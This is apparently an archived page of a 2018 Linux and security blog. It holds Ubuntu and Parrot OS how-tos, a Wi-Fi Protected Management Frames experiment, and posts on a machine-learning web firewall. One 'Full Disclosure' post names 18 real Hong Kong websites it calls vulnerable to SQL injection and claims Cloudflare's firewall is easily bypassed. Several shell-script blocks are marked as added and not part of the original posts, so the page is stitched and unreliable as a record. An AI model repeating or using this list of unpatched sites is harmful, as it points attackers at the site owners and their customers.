Make sure no error is displayed. If you find an error, do not reboot the box until you have fixed what you edited. Otherwise, the box will not reboot properly.

That's all! See you.


Monday, May 28, 2018

[RESEARCH] How Secure Is Your Wifi Network

Some information security experts still suggest hiding your SSID and setting up MAC address filtering, in addition to WPA2, AES and a strong passphrase, in order to keep your wireless network secure.

However, most wireless hacking tools can reveal a hidden SSID, and a MAC address can be easily spoofed. Fortunately, there is a feature that can be used to harden your wireless network. It is called Protected Management Frames, or IEEE 802.11w, even though it has not become standard practice since 2009.

What are Protected Management Frames (IEEE 802.11w) ?

Wi-Fi CERTIFIED WPA2 with Protected Management Frames provides WPA2 protection for unicast and multicast management action frames. Unicast management action frames are protected from both eavesdropping and forging, and multicast management action frames are protected from forging. WPA2 with Protected Management Frames augments WPA2 privacy protections already in place for data frames with mechanisms to improve the resiliency of mission-critical networks.

In order to understand how it works for the security of a wireless network, I did some experiments.

Hardware

(1) Home wireless router with the Protected Management Frames feature;
(2) Android 6.0 smartphone at 2.4GHz;
(3) Android 7.0 smartphone at 5GHz;
(4) Macbook Pro (Retina Mid 2012) with macOS High Sierra (10.13.4) at 5GHz;
(5) Macbook Air (Mid 2013) with macOS High Sierra (10.13.4) at 5GHz;
(6) Lenovo Thinkpad X201s (as 2.4GHz attacker); and
(7) TP-Link Archer T4UHP (as 2.4/5GHz attacker)

Software

(1) Parrot Security OS 4.0.1 64-bit;
(2) WAIDPS 1.0 R6j; and
(3) Aircrack-NG 1.2

The Lenovo Thinkpad X201s, installed with Parrot Security OS 4.0.1 with the latest updates and running WAIDPS (which is powered by Aircrack-NG 1.2), acts as the attacker.

The home wireless router and the test wifi devices are set to WPA2 with AES encryption. The firmware of the wireless router is up-to-date. Since the home wireless router is dual band, 2.4GHz and 5GHz, I set some of the test devices to 5GHz. The home wireless router is set to AP mode, as I already have a wired router in the network.

Once the 4-way handshake between the wireless router and a device is captured, an attacker can brute force the captured packets to obtain the passphrase of the wireless router.

Experiment

The Protected Management Frames can be set to "disabled", "capable" and "required" on the home wireless router.

(a) Disabled

When Protected Management Frames (PMF) is set to "Disabled" on the wireless router, all wireless devices can be disassociated and the 4-way handshake can be captured.

(b) Capable

When PMF is set to "Capable" on the wireless router, all devices can connect to the router without problems. However, the wireless devices can still be disassociated and the 4-way handshake can be captured.

(c) Required

When PMF is set to "Required", only the Macbook Pro and Macbook Air can connect to the wireless router; they cannot be disassociated, and the 4-way handshake cannot be captured.

(d) Extra

When PMF is set to "Capable" and all the devices are disconnected and then re-connected to the wireless router, the 4-way handshake can be captured.

When PMF is set to "Required" and the Macbook Pro and Macbook Air are disconnected and then re-connected to the wireless router, the 4-way handshake cannot be captured.

Conclusion

Purchase a wireless router equipped with the Protected Management Frames feature and set it to WPA2, AES and PMF "Required", with wireless devices that are compatible with PMF, such as macOS 10.13.4.

However, not all wireless routers and/or wireless devices are equipped with this feature, even expensive/high-end or commercial models.

Finally, when you find a wireless router equipped with this feature, make sure to update its firmware to the latest version often.

By the way, I am unwilling to provide the brand name of the home wireless router that I tested. Sorry for that!

That's all! See you.


Wednesday, May 23, 2018

Ubuntu 18.04 LTS Performance Tuning or not

After several experiments, I confirmed that the previous performance tuning for Ubuntu 16.04 LTS does not fit Ubuntu 18.04 LTS. The previous tuning, such as the hard drive read/write settings, will slow down Ubuntu 18.04 LTS. If you applied such tuning in Ubuntu 18.04 LTS and noticed a performance drop, consider turning it off or disabling it.

For example,

echo 1024 | sudo tee /sys/block/sda/queue/read_ahead_kb
echo 1024 | sudo tee /sys/block/sda/queue/nr_requests


That's all! See you.


HOWTO : Upgrade Parrot Security OS 3.11 to 4.0.1

Parrot Security OS 4.0.1 was released recently. You can upgrade to the latest version with the following commands.

sudo apt purge tomoyo-tools
sudo apt update
sudo apt full-upgrade
sudo apt autoremove


That's all! See you.


Wednesday, May 16, 2018

HOWTO : Install golang 1.10 on Ubuntu 18.04 LTS

The current version of golang in Ubuntu 18.04 LTS is 1.10.1 at the time of this writing.

Install

sudo apt update
sudo apt install golang


Check

go env
go version


Workspace

mkdir -p ~/go/{bin,pkg,src}

That's all! See you.


Sunday, May 13, 2018

HOWTO : Install Gnome Shell Extensions on Ubuntu 18.04 LTS

Ubuntu Desktop 18.04 LTS now ships with Gnome by default. You can tune Gnome with this tool.

sudo apt update
sudo apt install gnome-tweaks gnome-tweak-tool


The following are some useful Gnome Shell Extensions that come with Ubuntu 18.04.

If your computer or laptop does not have a hard disk LED, this extension is good for you.

sudo apt install gnome-shell-extension-hard-disk-led

If you do not have a multimedia keyboard, this extension is for you.

sudo apt install gnome-shell-extension-mediaplayer

You can monitor CPU load, memory usage and Internet traffic with this extension.

sudo apt install gnome-shell-extension-system-monitor

You can see the current conditions and the forecast of your local weather with this extension.

sudo apt install gnome-shell-extension-weather

If you have some old system tray icons, you may need this extension. However, some old system tray icons are not compatible with it.

sudo apt install gnome-shell-extension-top-icons-plus

Run Gnome Tweaks to enable the extension(s) that you have installed. After that, logout and re-login.

To see all the Gnome Shell Extensions that come with Ubuntu 18.04.

apt-cache search gnome-shell-extension

That's all! See you.


HOWTO : Upgrade Ubuntu Gnome 16.04 LTS to Ubuntu Desktop 18.04 LTS

There is no version 18.04 of Ubuntu Gnome at the moment. If you want to upgrade from Ubuntu Gnome 16.04 to Ubuntu 18.04, you can follow the procedure below.

Step 0 :

update-manager -cd

After that, reboot the box.

Step 1 :

sudo apt remove gnome-session ubuntu-gnome-desktop gnome-session-flashback plymouth-theme-ubuntu-gnome-text plymouth-theme-ubuntu-gnome-logo

Select "gdm3" when asked.

Step 2 :

sudo update-alternatives --config default.plymouth

Select "auto mode" for "/usr/share/plymouth/themes/ubuntu-logo/ubuntu-logo.plymouth".

Step 3 :

sudo update-initramfs -u

Then reboot.

That's all! See you.


HOWTO : Radiotray-NG on Ubuntu 18.04 LTS

Radiotray-NG is an internet radio program for streaming music and online radio.

wget https://github.com/ebruck/radiotray-ng/releases/download/v0.2.2/radiotray-ng_0.2.2_ubuntu_18.04_amd64.deb
sudo dpkg -i radiotray-ng_0.2.2_ubuntu_18.04_amd64.deb
sudo apt --fix-broken install


RTHK Radio Channels (Optional)

Radio 1 - http://rthk.hk/live1.m3u
Radio 2 - http://rthk.hk/live2.m3u
Radio 3 - http://rthk.hk/live3.m3u
Radio 4 - http://rthk.hk/live4.m3u
Radio 5 - http://rthk.hk/live5.m3u
Putonghua - http://rthk.hk/livepth.m3u

After adding or editing the channels, make sure to reload the bookmarks.

That's all! See you.


Thursday, May 10, 2018

HOWTO : Install Deepin Desktop Environment on Ubuntu Desktop 18.04 LTS

Deepin Desktop Environment (DDE) is an open source project by Deepin Technology Co. Ltd., Wuhan, China. Besides installing Deepin Linux 15.5 or higher, you can install it on Ubuntu Desktop 18.04 LTS.

Install Deepin Desktop Environment (DDE)

sudo add-apt-repository ppa:leaeasy/dde
sudo apt-get update
sudo apt install dde


The following is for experiment only (not recommended by the PPA creator).

sudo apt install dde deepin-gtk-theme dde-control-center-plugin-notify dde-control-center-plugin-weather redshift libfprint0 dnsmasq cgroup-tools imwheel libpam-fprintd fprintd network-manager-l2tp network-manager-openconnect network-manager-openvpn network-manager-vpnc minicom deepin-calculator dde-file-manager

Install RecordMyDesktop (Optional)

sudo apt install gtk-recordmydesktop

* When "Window Effect" is disabled, "Deepin Screen Recorder" and "Multitasking View" are disabled too.

Set Font of the system (Optional)

Set the font to "Ubuntu" and "Ubuntu Mono", and increase the font size when necessary.

Disable Window Effect Mode (Optional)

When you find that booting to the desktop takes a long time and video playback lags, consider disabling the Window Effect, as your display card is not powerful enough.


The following optional settings are for Chinese users only. Ubuntu's default ibus is not compatible with Deepin DDE, and you need to use fcitx instead:

If you are using the English version of Ubuntu, you are required to install the Traditional Chinese fonts or the Simplified Chinese fonts.

Traditional Chinese

sudo apt install language-pack-gnome-zh-hant-base language-pack-gnome-zh-hant

or

Simplified Chinese

sudo apt install language-pack-gnome-zh-hans-base language-pack-gnome-zh-hans

Install Cangjie Quick Input Method (Optional)

sudo apt install fcitx fcitx-table-quick-classic fcitx-config-gtk

Install Cantonese Input Method (Optional)

sudo apt install fcitx fcitx-table-cantonese fcitx-config-gtk

Install Cangjie 3rd Generation Input Method (Optional)

sudo apt install fcitx fcitx-table-cangjie3 fcitx-config-gtk

Install Cangjie 5th Generation Input Method (Optional)

sudo apt install fcitx fcitx-table-cangjie5 fcitx-config-gtk

After installing the desired Chinese input method, go to "Language Support" to switch from "ibus" to "fcitx", and make sure to install the missing packages when asked on launching "Language Support". Toggle the input method by pressing "Ctrl+Space", and set your input method as the default when necessary.

You can even switch between the Gnome and Deepin desktop environments when you log in. If you want to delete Deepin DDE forever, you can run the following commands :

sudo apt remove dde

or

sudo apt remove dde dde* deepin* deepin-gtk-theme dde-control-center-plugin-notify dde-control-center-plugin-weather redshift libfprint0 dnsmasq cgroup-tools imwheel libpam-fprintd fprintd network-manager-l2tp network-manager-openconnect network-manager-openvpn network-manager-vpnc minicom deepin-calculator dde-file-manager
sudo apt autoremove
sudo apt update

Reference

How to Install Deepin Desktop Environment on Ubuntu 18.04

That's all! See you.


Tuesday, May 01, 2018

HOWTO : upgrade Ubuntu 16.04 LTS to 18.04 LTS on Croissants

First of all, make sure your Croissants box has sufficient free hard drive space, otherwise the upgrade will fail.

sudo apt install update-manager-core
sudo do-release-upgrade -d


Answer "Y" to all questions asked.

After the upgrade, you need to run the following commands :

Remove the first "# " from /etc/apt/sources.list.d/evebox.list
Remove the first "# " from /etc/apt/sources.list.d/elastic-5.x.list

sudo update-java-alternatives -s java-1.8.0-openjdk-amd64
sudo systemctl enable logstash
sudo systemctl enable elasticsearch
sudo systemctl enable kibana


Then you can reboot your Croissants.

That's all! See you.


HOWTO : Upgrade Ubuntu Server 16.04 to 18.04

Ubuntu 18.04 LTS has just been released. It is high time to upgrade your Ubuntu Server 16.04 LTS to 18.04 LTS. Before upgrading, make sure you have sufficient free space.

Step 1 :

sudo apt install update-manager-core
sudo do-release-upgrade -d


You need to answer "Y" to all questions asked.

Step 2 :

Make sure to enable all the required repositories in /etc/apt/sources.list.d/ and then run the following command.

sudo apt update
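This step is the same task as the "Remove the first "# "" instructions for evebox.list and elastic-5.x.list in the Croissants post above. As an added example that is not part of the original post, the following shell function re-enables the apt source lines that do-release-upgrade commented out. It strips the leading "# " only from deb/deb-src lines and drops the upgrader's trailing "# disabled on upgrade to <codename>" marker where present (that marker format is an assumption about the upgrader's output, not something the post states); genuine comments in the file are left untouched.

```shell
#!/bin/sh
# Added example, not from the original post: re-enable third-party apt
# sources that do-release-upgrade disabled during the 16.04 -> 18.04 upgrade.
# Assumed upgrader format: each entry is prefixed with "# " and suffixed with
# " # disabled on upgrade to <codename>". Only deb/deb-src lines are
# uncommented; ordinary comment lines are preserved.

# reenable_sources FILE
# Rewrites FILE in place and prints how many source lines were re-enabled.
reenable_sources() {
    file=$1
    count=$(grep -cE '^# deb(-src)? ' "$file" || true)
    tmp=$(mktemp)
    sed -E \
        -e '/^# deb(-src)? /s/ # disabled on upgrade to [a-z]+$//' \
        -e 's/^# (deb(-src)? )/\1/' "$file" > "$tmp"
    cat "$tmp" > "$file"   # keeps the original owner and mode of FILE
    rm -f "$tmp"
    echo "$count"
}

# enabled_sources FILE
# Prints the number of active deb/deb-src lines, to confirm the result.
enabled_sources() {
    grep -cE '^deb(-src)? ' "$1" || true
}

# Usage on the upgraded box (root is needed to write under /etc/apt):
#   reenable_sources /etc/apt/sources.list.d/evebox.list
#   reenable_sources /etc/apt/sources.list.d/elastic-5.x.list
#   apt update
```

Run apt update afterwards, as the post says, so the re-enabled repositories are fetched again; inspect the file first if it holds entries you deliberately retired, since every commented deb line in it is re-enabled.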

Step 3 :

If you have an application that works only on Java 8, make sure to do the following.

update-java-alternatives -l
sudo update-java-alternatives -s java-1.8.0-openjdk-amd64


or

sudo update-alternatives --config java

Then select Java 8.

Step 4 :

If your system is running PHP, you need to reinstall all the required packages. For example,

sudo apt-get install php7.2-cgi php7.2 php7.2-cli php7.2-mysql php7.2-curl php7.2-gd php7.2-intl php7.2-imap php7.2-pspell php7.2-recode php7.2-sqlite3 php7.2-tidy php7.2-xmlrpc php7.2-xsl apache2-utils php7.2-fpm php-memcache php-imagick mysql-server mysql-client php7.2-mbstring php7.2-zip

Make sure to do the following when you are using php7.2-fpm on Apache2 :

sudo a2enmod php7.2
sudo a2enconf php7.2-fpm
sudo systemctl enable php7.2-fpm
sudo systemctl enable apache2
sudo systemctl restart php7.2-fpm
sudo systemctl restart apache2


That's all! See you.

Thursday, April 26, 2018

HOWTO : Install Parrot Security OS 3.11 32-bit

Since the 32-bit version of Parrot Security OS 3.11 crashes in the middle of the installation even though the hash checksum matches the official one, we can install the "Home" version and then install the necessary tools with the following commands.

sudo apt update
sudo apt install parrot-tools-full


That's all! See you.


Tuesday, April 24, 2018

Deepin Linux 15.5

Deepin OS 15.5 (Deepin Desktop), from Wuhan Deepin Technology in China, is a desktop system built on Debian Linux. Deepin shows how highly customizable Linux can be, and it rivals Apple's macOS.

Deepin 15.5 is easy and straightforward to install, with few inputs and options. When installed in a VirtualBox virtual machine, it offers a choice between Effect mode and Common mode. Common mode runs faster, but without the special effects.

Using Deepin 15.5 feels very much like using Apple's macOS. The interface is very intuitive and polished, and you will not get lost among a large number of options.

Its software repository (Deepin Store) collects many practical applications, and installing and removing them is very easy. The store has a strong flavour of the macOS App Store. It is clear that Wuhan Deepin Technology has invested a great deal of resources in developing this system.

This operating system is very suitable for Linux beginners or users who want something simple and direct. It is also a good alternative to Ubuntu Linux. The drawbacks are that it has no full disk encryption, passwords are limited to a maximum of sixteen characters, and some software versions are rather old.

Wuhan Deepin Technology Co. Ltd. (China) develops a Debian-based Linux system named Deepin Desktop. The current version at the time of this writing is 15.5. The look of Deepin is much like Apple macOS.

Installation of Deepin 15.5 is very easy and simple. Only a little information has to be filled in or selected during the installation. When installed in VirtualBox, you are offered a choice of "Effect mode" or "Common mode". Common mode is faster than Effect mode. Deepin Desktop 15.5 is very easy to use. The design is very straightforward and simple. If you have experience with Apple macOS, you will find it very similar.

There is some useful software in the Deepin Store, which is much like the App Store in macOS. Installing and uninstalling any software is very easy. It is believed that Wuhan Deepin Technology has invested a lot of resources in building this Linux distribution.

Deepin Desktop is suitable for Linux newbies and anyone who loves simple operation. If you do not like Ubuntu Linux, you may try Deepin Desktop instead. The only downsides of Deepin are the lack of full disk encryption, a user password length limit of 16 characters, and some slightly out-dated software.

That's all! See you.


Reference

Linux Deepin is NOT spyware


Full disk encryption on Deepin 15.5


Sunday, April 22, 2018

My View on Linux

Everyone has their own reasons for choosing Linux, but most people originally used Windows. They mostly share one thing: they constantly complain that they cannot find substitutes for the applications they had on Windows. Yet this problem rarely arises among Apple (macOS) users. Where does the problem lie?

Windows, Apple and Linux are fundamentally different products, each with its own character. Apple derives from the BSD system, which is a Unix system; Linux is a Unix-like system developed independently; and Windows is an independently developed non-Unix system. They have all taken different directions of development, and apart from Linux, both Windows and Apple were applied to the desktop very early on.

Windows is in the software business, Apple is mainly in the hardware business, and Linux is basically non-profit.

Apple also lacks many substitutes for other commercial products, yet Apple users do not make the demands and complaints that Windows users make when they use Linux. I think this is because Apple users are a distinct group: they do not complain about the lack of similar substitutes, but accept products that differ from what Windows users use.

Because Linux is open source and basically free, most developers use their own private time to develop software, so most of the software they develop is not written with commercial considerations in mind; most developers write it for themselves or for a small group of people. Later, some of them also developed analogues of other commercial products, but not substitutes for them, and there are also some applications that other commercial products do not have. This shows the uniqueness of Linux.

In fact, Windows users should not bring their Windows expectations with them when using Linux. They should accept the different characteristics and development of each type of operating system. Windows users and Apple users differ greatly in temperament and expectations, and here I greatly admire the adaptability of Apple users. So are Windows users perhaps asking too much of Linux, wanting "the horse to run well but not to eat grass"?

Open-source Linux has given rise to all kinds of distributions, each with its own unique character. The basic commands and architecture of each distribution are roughly the same; the biggest differences lie in the package management commands and the desktop system (window manager). Different Linux distributions have different package managers and desktop systems.

The attraction of Linux lies in its very high malleability; its customizability can be taken to extraordinary lengths. In addition, all programming languages and compilers are completely open source and free. This has produced a diverse range of tools for a diverse range of applications. Every software engineer can build a Linux distribution or application system with their own personal character.

As for why there are no products identical to the applications of other operating systems, I think this is not unrelated to intellectual property, so Linux cannot be blamed for being inconsiderate. As the saying goes, "if you want someone to be just like me, there would have to be two of me".


Friday, April 20, 2018

Wordpresscan - Wordpress Security Scanner

Wordpresscan is a WordPress CMS security auditing tool by swissky which rewrites WPScan in Python and implements some ideas from WPSeku. However, the original copy on GitHub is still an alpha version and is dated Oct 15, 2017.

Wordpresscan was then forked by Samiux on Apr 19, 2018, with some improvements as well as bug fixes. The modified version is released as open source under GPLv3 by Samiux.

It is well tested on Parrot Security OS 3.11 and can run right away on Parrot without installation.

You can visit the official site for details.

That's all! See you.


Monday, April 16, 2018

HOWTO : Update Parrot Security OS 3.11

Parrot Security OS 3.11 cannot be updated properly with the default updater after a fresh install. We can update it manually.

sudo apt update
sudo apt -y full-upgrade --allow-downgrades
sudo apt -y autoclean
sudo apt -y autoremove


When asked about updating the configuration files, select "Y" when necessary.

That's all! See you.


HOWTO : Fallback to OpenJDK 8 on Parrot Security OS 3.11

Since OpenJDK 9 is installed by the recent update on Parrot Security OS 3.11, some Java applications that use OpenJDK 8 may not work properly. We can fall back to OpenJDK 8 easily.

sudo update-alternatives --config java

Then select OpenJDK 8 or OpenJRE 8 as needed. You can change back to OpenJDK 9 at any time with the same command.

That's all! See you.


Sunday, April 15, 2018

HOWTO : Fix Vokoscreen 2.5.0 on Parrot Security OS 3.11

Vokoscreen 2.5.0 on Parrot Security OS 3.11 does not work properly because ffmpeg crashes. You can fix this problem by replacing ffmpeg with Vokoscreen's copy.

wget http://linuxecke.volkoh.de/vokoscreen/ffmpeg-64bit.tar.gz
tar -xvzf ffmpeg-64bit.tar.gz

sudo mv /usr/local/bin/ffmpeg /usr/local/bin/ffmpeg-original
sudo cp ffmpeg /usr/local/bin/


That's all! See you.


Tuesday, March 20, 2018

Longjing - Deep Learning Driven Web Application Firewall

Longjing is a Chinese green tea full of antioxidants. It is good for health and for fighting cancer. Longjing Web Application Firewall (WAF) is deep learning driven and developed with Python 3 and the Scikit-Learn library. It is described as deep learning because it uses a neural network MLP Classifier to build the model. Even though it is a simple neural network MLP classifier, the accuracy rate is very high. It supports Linux systems only.

Longjing WAF is mainly designed to protect web applications from being attacked by SQL Injection (SQLi), which is at the top of the OWASP Top 10 in 2017. A successful attack causes data leakage and/or system compromise. It is a critical vulnerability for web applications.

Longjing WAF is well tested on Damn Vulnerable Web Application (DVWA) with Burp Suite, SQLMap, OWASP ZAP, XSSER and Commix. It detects not only SQLi but also XSS (Cross-site Scripting). The accuracy rate is over 99% in the sample tests. It can easily be tuned further for false positives, as the running code is an open source project released under GPLv3 by Samiux. However, the training data and the model are not open sourced.

It is not very complicated to install and deploy. The latest version at the time of this writing is 0.9.1. It works with Anaconda 3 and MitmProxy 3.0.3. Anaconda installs all the required Scikit-Learn Python libraries for you and is also very easy to maintain. MitmProxy acts as a proxy to handle the HTTP/HTTPS requests and responses.

Longjing is the next generation Web Application Firewall! Fetch it and try!

That's all! See you.


Reference

Longjing - Web Application Firewall

Saturday, March 03, 2018

[Full Disclosure] Vulnerable Web Sites In Hong Kong (March 2018)

Since I am not a White Hat, I will disclose all my findings fully to the public. Do not blame me for that! I am a Grey Hat.

Recently, I found out that the personal web site of the anti-government politician in Hong Kong, Claudia Mo, has been hacked since 2016. Some China-related videos and statements have been posted to the site since 2017. Meanwhile, the volunteers' personal particulars have been leaked on Pastebin since 2016. The most important thing to know is that the site was protected by Cloudflare, a kind of cloud-based DDoS protection and web application firewall (WAF).

I conducted a very simple and quick check on the site some days before yesterday and confirmed that her site was vulnerable to blind SQL injection. However, her site has been deleted since yesterday (March 2, 2018, Hong Kong Time).

After a simple search, it was confirmed that the site was developed by OneTeam.hk. Some other sites developed by them were obtained by Google search and from their official site. Another quick and simple test was conducted on those sites.

The result shows that about 18 web sites are vulnerable to SQL injection. It seems that those sites are developed with a vulnerable library.

The URLs of those sites are listed below for reference. It may not be a complete list. I am not responsible for any loss and/or damage caused once those sites have been disclosed. You have been warned that you will be put in jail if you attack or do evil on those sites.

Finally, some web developers in Hong Kong cannot build a secure web site properly. They believe that Cloudflare can protect the sites in a very secure manner. Cloudflare WAF can be bypassed very easily. Before investing money in your web site, please consider the ability of the web developers and the security of the web applications.

Vulnerable sites :

http://www.geosecurities.com.hk/
http://www.charleskwok.hk/
http://shopkeeper.oneteam.hk/silverhealth/index.php
http://www.wiseland.com.hk/
http://www.islandsouth.hk/
http://www.hkdogschool.com/
http://www.newrecordltd.com/
http://www.winner28.cc/
http://www.ur-choize.com/
http://sealairsoft.com/
http://www.instantbuy.hk/
http://www.iiistyle.com/
http://www.toptrendint.com/
http://www.studioone.hk/
http://www.walterly.com.hk/
http://www.kangxi.hk/
http://www.crazymorestore.com/
http://www.trusty.hk/

Non vulnerable sites :

http://oneteam.hk/
http://www.musicianxdesigner.com/
http://shopkeeper.oneteam.hk/bq/
http://www.jpmyhouse.hk/
https://www.swordtacticalsupply.com/
http://taodeliver.mofa.ht/
http://www.mingkoi.com/
http://www.wai-hei.com/
http://innercare.com.hk/
http://www.95gd.hk/
http://siman.com.hk/

That's all! See you.


Monday, February 26, 2018

Longjing - Machine Learning Driven Web Application Firewall

Longjing is a Chinese green tea with a lot of antioxidants. It is good for health. Longjing Web Application Firewall (WAF) is machine learning driven and is designed to protect web applications from being attacked by SQL injection.

Longjing WAF is written in Python and is not designed with high performance in mind. Only Linux is supported.

Longjing WAF can protect your web application from being scanned by Burp Suite, SQLMap, OWASP ZAP, XSSER and Commix even if your web application has an SQL injection vulnerability. Meanwhile, reflected Cross Site Scripting (XSS) can be detected too.

SQL injection is in the top position of the OWASP Top 10 2017 and can lead to data leakage and/or system compromise. It is a critical vulnerability.

Longjing WAF is a PARTIALLY open source project under the GPLv3 license by Samiux. Training and modelling are NOT open sourced. A demo may be provided when necessary.

Training requires about 3 hours on an Intel i7-5500U with 16GB RAM. The accuracy rate is over 99%. Longjing requires about 3GB RAM to run.

Requirement

- Ubuntu Linux Server 16.04.4 LTS
- Anaconda3
- mitmproxy
- web server
- web application
- SSD is recommended
- at least 8GB RAM

Installation

(A) Install Anaconda

sudo apt install build-essential libssl-dev libffi-dev python3-dev

wget https://repo.continuum.io/archive/Anaconda3-5.1.0-Linux-x86_64.sh

chmod +x Anaconda3-5.1.0-Linux-x86_64.sh

sudo -sH

./Anaconda3-5.1.0-Linux-x86_64.sh

Install anaconda3 to /etc/anaconda3 and then answer "yes" to allow it to change the .bashrc of root.

source /root/.bashrc
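The Anaconda installer above is run as root straight after download, and the Radiotray-NG .deb and the Vokoscreen ffmpeg tarball in the posts earlier on this page are installed the same way. As an added example that is not part of the original post, the following shell function checks a downloaded file against the SHA-256 digest that the upstream project publishes before it is executed or installed. The digests in the usage comments are placeholders to be replaced with the published values; the function itself only compares what sha256sum computes with what you give it.

```shell
#!/bin/sh
# Added example, not part of the original post: verify a downloaded installer,
# .deb or tarball against the SHA-256 digest published by the upstream
# project before running or installing it. Take the digest from the project's
# own download page, not from the same place the file was fetched from.

# sha256_of FILE
# Prints the hex digest using coreutils sha256sum, or shasum where absent.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 FILE EXPECTED_HEX
# Returns 0 when the digest matches, 1 on a mismatch or a missing file.
# The comparison is case-insensitive so a pasted upper-case digest works.
verify_sha256() {
    file=$1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    if [ ! -f "$file" ]; then
        echo "missing file: $file" >&2
        return 1
    fi
    actual=$(sha256_of "$file")
    if [ "$actual" = "$expected" ]; then
        echo "OK: $file"
        return 0
    fi
    echo "MISMATCH: $file" >&2
    echo "  expected $expected" >&2
    echo "  actual   $actual" >&2
    return 1
}

# Usage (<published-sha256> is a placeholder for the digest from upstream):
#   verify_sha256 Anaconda3-5.1.0-Linux-x86_64.sh <published-sha256> \
#       && ./Anaconda3-5.1.0-Linux-x86_64.sh
#   verify_sha256 radiotray-ng_0.2.2_ubuntu_18.04_amd64.deb <published-sha256> \
#       && sudo dpkg -i radiotray-ng_0.2.2_ubuntu_18.04_amd64.deb
#   verify_sha256 ffmpeg-64bit.tar.gz <published-sha256> \
#       && tar -xvzf ffmpeg-64bit.tar.gz
```

Chaining the install behind `&&` means a mismatch or a missing file stops the procedure instead of silently installing whatever was downloaded.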

(B) Update Anaconda

sudo -sH
conda update --prefix /etc/anaconda3 anaconda
conda update -n base conda


(B) Install mitmproxy

sudo -sH
conda install pip
pip install mitmproxy


The current version of mitmproxy at this writing is 3.0.3.

Exit to the normal user by entering exit.

(C) Update mitmproxy

sudo -sH
cd /etc/anaconda3
pip install mitmproxy --upgrade


(D) Install Longjing

wget https://www.infosec-ninjas.com/files/longjing-0.8.0.tar.gz
tar -xvzf longjing-0.8.0.tar.gz

cd longjing

nano config.conf


where :
- NET_INF is the network interface on which mitmproxy listens
- PORT is the port number on which mitmproxy listens, e.g. 8080
- CERT is the path to the TLS/SSL certificate (with its private key) of the domain, when available. The value should start with --certs.

Please read the mitmproxy "about certificates" documentation for details - Using a custom certificate.

sudo ./install.sh

Finally, make sure to copy index.html to the web application root directory.

(D) Running

sudo systemctl restart longjing.service

(E) Testing with Tools

Longjing is well tested on Damn Vulnerable Web Application (DVWA) with the following tools :

- Burp Suite on DVWA (sqli and xss blocked except DOM)
- sqlmap on DVWA (tamper also blocked)
- OWASP ZAP on DVWA (sqli and xss blocked)
- xsser on DVWA (xss blocked)
- Commix on DVWA (blocked and Commix will hang in the middle)

That's all! See you.


Thursday, January 18, 2018

HOWTO : Install MicroCode in Ubuntu Linux

Linux can update the CPU microcode to fix the Meltdown and Spectre vulnerabilities instead of a BIOS update. Ubuntu can fix the vulnerabilities with just one command.

sudo apt update
sudo apt dist-upgrade


For Intel CPU :

sudo apt install intel-microcode

For AMD CPU :

sudo apt install amd64-microcode

After that, reboot your Ubuntu box.
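After the reboot, the kernel reports which mitigations are active under /sys/devices/system/cpu/vulnerabilities (one file per issue) and the loaded microcode revision appears in /proc/cpuinfo. As an added example that is not part of the original post, the following shell functions read both; the paths are parameters so the functions can also be run against constructed copies, which is how they are exercised below.

```shell
#!/bin/sh
# Added example, not from the original post: after rebooting with the new
# microcode, check what the kernel reports for the Meltdown/Spectre
# mitigations and which microcode revision is loaded.

# report_mitigations [DIR]
# Prints "issue: status" for every file in DIR (default: the kernel's
# vulnerabilities directory) and returns 1 if any status starts with
# "Vulnerable", 0 otherwise.
report_mitigations() {
    dir=${1:-/sys/devices/system/cpu/vulnerabilities}
    rc=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        status=$(cat "$f")
        printf '%s: %s\n' "$(basename "$f")" "$status"
        case $status in
            Vulnerable*) rc=1 ;;
        esac
    done
    return $rc
}

# microcode_revision [CPUINFO]
# Prints the microcode revision of the first CPU listed in /proc/cpuinfo
# (or in the file given), e.g. 0xc2.
microcode_revision() {
    awk -F': ' '/^microcode/ { print $2; exit }' "${1:-/proc/cpuinfo}"
}

# Usage on the real box:
#   report_mitigations || echo "some issues are still reported as Vulnerable"
#   echo "microcode revision: $(microcode_revision)"
```

Compare the revision printed before and after the reboot; an unchanged value means the new microcode package did not cover your CPU model, and the mitigation files tell you whether the kernel still reports any issue as vulnerable.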

That's all! See you.


Update on JAN 24, 2018

Since Linux creator Linus Torvalds disagreed with installing Intel's patches for Spectre, the Intel microcode has been patched back to the previous version. You are not required to uninstall it. Just update, and it will be patched back to the previous version. Please see The Hacker News for details.

sudo apt update
sudo apt dist-upgrade


Monday, January 08, 2018

New Year New You 2018!

This year, I am interested in Machine Learning Python programming. A useful Python 3.x environment is Anaconda. Download the shell script and it will install Python 3.x and all the related Python libraries for you. Your Linux may then have 2 copies and 2 versions of Python and their libraries. You can uninstall Anaconda when you do not need it. This tool is very easy to use. You can also use Jupyter Notebook for development.

Since I am not good at maths, I am going to find an easier way to learn Machine Learning. The following is the list that I found on the internet from which I can understand Machine Learning programming and concepts.

I have just modified faizann24's Python script and the demo is below :

I wrote the script from scratch. The demo is here :

The following demo is version 0.3 of the Machine Learning Driven Web Application Firewall :

The following demo is version 0.5 of the Machine Learning Driven Web Application Firewall. It runs much faster than the previous versions :

Reference

[1] Josh Gordon's Machine Learning Recipes Video
[2] Machine Learning for Complete Beginners
[3] Machine Learning for Security Informatics
[4] Machine Learning is Fun
[5] FWAF Machine Learning Driven Web Application Firewall
[6] FWAF Machine Learning Driven Web Application Firewall (GitHub)
[7] Machine Learning Tutorial Video
[8] How To Build a Machine Learning Classifier in Python with Scikit-learn

That's all! See you.


Friday, January 05, 2018

New year New Hack 2018!

On Jan 4, 2018, GoldJoy Holidays reported that their server had been hacked. It is the second local travel agency to be hacked this month so far. The first one is Big Line Holiday, which was hacked on Jan 3, 2018.

Big Line Holiday is hosted on their own server, which runs Microsoft IIS 8.5 and PHP 5.5.30 with no SSL certificate. On the other hand, GoldJoy Holidays is hosted at a web hosting company (the name is unknown to me) running Debian Linux, Apache 2.4.10 and PHP 5.6.31. It is believed that Big Line Holiday runs a custom web application while GoldJoy Holidays runs Joomla! Meanwhile, both of them are without security headers.

Today, Jan 5, 2018, GoldJoy Holidays announced that they have applied layers of firewall to their website. I am curious to know what kind of firewall they applied.

